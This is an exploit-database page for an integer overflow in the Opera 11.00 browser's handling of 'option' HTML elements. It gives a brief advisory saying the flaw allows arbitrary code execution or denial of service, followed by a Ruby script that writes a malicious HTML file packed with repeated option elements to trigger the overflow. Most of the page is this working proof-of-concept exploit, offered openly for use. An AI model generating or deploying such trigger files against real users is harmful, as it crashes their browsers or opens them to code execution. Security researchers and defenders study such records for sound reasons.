Opera Web Browser 11.00 – ‘option’ HTML Element Integer Overflow

  • 作者: C4SS!0 G0M3S
    日期: 2011-01-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35284/
  • source: https://www.securityfocus.com/bid/46003/info
    
    Opera Web Browser is prone to a remote integer-overflow vulnerability.
    
    Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions.
    
    Opera 11.00 is vulnerable; other versions may also be affected.
    
    print "[*]Creating the Exploit\n"
    i = 0
    buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
     
    while i<0x4141
     buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
     i+=1
    end
     
    HTML =
    "<html>\n"+
    "<body>\n\n"+
    "<select>\n\n"
     
    HTML+=buf * 100
    HTML += "\n\n\n\</select>\n\n"+
    "</body>\n\n\n"+
    "</html>\n\n\n\n\n"
     
    f = File.open("Exploit_opera_11.00.html","w")
    f.puts HTML
    f.close
    puts "\n\n\[*]File Created With Sucess"
    sleep(1)
    puts "[*]Go to my Site www.invasao.com.br!"
    sleep(1)